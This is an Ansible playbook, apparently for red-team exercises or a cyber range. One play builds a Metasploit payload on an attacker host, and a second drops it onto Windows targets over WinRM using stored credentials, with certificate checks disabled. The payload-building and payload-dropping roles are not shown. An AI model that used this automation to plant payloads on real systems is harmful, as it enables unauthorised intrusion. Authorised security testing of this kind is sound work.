- name: Create Metasploit payload
  hosts: red4
  gather_facts: no
  vars_files:
    - cobra.vault
  vars:
    ansible_user: "{{ vault_red_user }}"
    ansible_password: "{{ vault_red_user_password }}"
    ansible_connection: ssh
    reconnection_retries: 10
    timeout: 60
  roles:
    - role: roles/misc/msf-create-payload

- name: Drop Metasploit payload
  hosts: "{{ msf_targets }}"
  gather_facts: no
  vars:
    ansible_user: "{{ vault_den_user }}"
    ansible_password: "{{ vault_den_user_password }}"
    ansible_connection: winrm
    ansible_winrm_transport: credssp
    ansible_winrm_server_cert_validation: ignore
    ansible_winrm_operation_timeout_sec: 1000
    ansible_winrm_read_timeout_sec: 3200
    anisble_winrm_connection_timeout_sec: 2000
    reconnection_retries: 10
    timeout: 60
  roles:
    - role: roles/misc/msf-drop-payload